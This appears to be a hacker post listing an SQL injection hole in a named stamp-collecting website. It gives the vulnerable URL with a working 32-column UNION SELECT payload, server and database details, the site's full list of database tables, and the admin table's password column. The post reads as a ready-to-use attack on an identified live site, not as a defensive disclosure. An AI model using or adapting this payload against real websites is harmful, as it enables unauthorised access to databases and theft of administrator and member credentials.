- We love this Sites. So we never disturb it. Promise! :DHost Information Server = Microsoft-IIS/6.0 Version = 5.1.30-community Powered by = ASP.NET,PHP/5.2.13 Attack Type = SQL Union Injection Current User = STAMPSmyanmar@sec760.servdns.com Current Database = stampsmyanmar Union Columns = 32
Url| http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10 Vuln: http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32Click post title, if show/hide function is not work. Warning: Don't Deface or .....!
Database:stampsmyanmar information_schema stampsmyanmar Tables:stmyr_admin stmyr_admin stmyr_article stmyr_continents stmyr_country stmyr_cov stmyr_cto stmyr_election stmyr_env stmyr_exhibition stmyr_exhibition_admin stmyr_exhibitor stmyr_exhibitor_pic stmyr_fanclub stmyr_fc_admin stmyr_fdc stmyr_fly stmyr_homeforexhibition stmyr_internationalstampissues stmyr_journey stmyr_kevin_journey stmyr_login stmyr_ltr stmyr_ltrtype stmyr_mainthemes stmyr_marketplace stmyr_materialtype stmyr_member stmyr_mp_comment stmyr_newsletters stmyr_ozone stmyr_pcd stmyr_pcdtype stmyr_post stmyr_reg stmyr_reply_post stmyr_stampoftheweek stmyr_statedivision stmyr_stm stmyr_tusm stmyr_tusm_foru stmyr_wantlist stmyr_yearrange Columns: Table stmyr_admin admin_password admin_level
Show/Hide -